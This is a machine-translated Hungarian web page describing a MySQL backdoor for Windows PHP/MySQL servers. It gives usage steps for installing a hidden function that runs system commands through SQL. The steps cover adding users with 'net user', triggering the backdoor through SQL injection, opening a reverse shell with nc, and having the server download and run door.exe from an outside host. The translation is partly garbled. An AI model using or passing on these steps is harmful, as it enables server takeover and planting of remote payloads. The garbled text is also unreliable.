Mysql backdoor
Forrás: Puri Manchester
A MySQL backdoor volt a hátsó ajtó kialakítása PHP + MySQL szerver MySQL után a hátsó ajtón telepíteni hozzá az "állami" funkció rendszer parancsokat futtatni, és indítsa el a MySQL folyamat, amely a DLL szippantás típusú hátsó ajtó, ügyesen realizált nincs port, nincs folyamat, nincs szolgáltatás a falon keresztül trójai. program WINXP WIN2003 + MYSQL5.0.X, és a bérlet alatt.
A telepítés Mysql.php átterjedt a PHP szerver szerint töltse ki a Host-User-Password-DB, kattintson az "auto-install mysql backdoor"
A sikeres telepítést követően Mysql növelné egy "állami" funkció, míg a folyamat Mysql fut szippantás a hátsó ajtón a hátsóajtó a Windows rendszer ugyanolyan kiváltságokat és a MySQL.
Az állami funkciók használata
Állami funkció valójában egy PHP system () "függvény ugyanazt a funkciót lehet használni, hogy végre a rendszer parancsokat. Kérjük, adja meg az SQL parancsot:" Hivatal és töltse ki a mysql utasítást kell végrehajtani, mint például a "válassza ki az állam (a" net user nohack / add "), kattintson a" Execute SQL eredményeket fog futni.
Az állami funkció alapján Sniff a hátsó ajtón, még ha WebShell elveszett, amíg a szerver, SQL injekció pont, akkor a beadás. Php? Id = 1 és az állam ("net user ')" metódus a szerveren A parancsot. Azonban, ha az injekció pont nem igaz? még mindig hívja Sniff a hátsó ajtót vezérlő szerver. küldenie a port a szerver és nyitott a MySQL-"az elején a csomagot, majd tudja hívni a Sniff a hátsó ajtón, mint például:
Egy futó rendszer a parancs: az NC az IP 80 -> Enter -> MySQL-cmd / c net user az abc / add> c :/ log.txt, (Megjegyzés: az utolsó "!" Nem lehet hagyni)
2 20082 port a héj a helyi szerver Bounce: 1. futama nc-LP 20 082 figyelemmel kíséri a gép 20082 portot, majd az nc az IP 80 -> Enter -> MySQL-c -> Enter
Hagyja, hogy a szerver letöltés: az NC IP 80 -> Enter -> MySQL-http :/ / www.x.com a /-c door.exe mydoor.exe (Megjegyzés: az utolsó! "Nem lehet hagyni)
Amellett, hogy elküldi a "mysql-c-", a másik parancs nincs visszhang, de a megfelelő parancsokat a szerver fut.
Mysql eltávolítása a run "drop funkciót állapot" lehet rakodni, de ugyanakkor hatására a mysql folyamat kilép, visszatér a normál újraindítás után.










































149 Trackback (ek)
Be kell jelentkezned , hogy megoszthassa véleményét.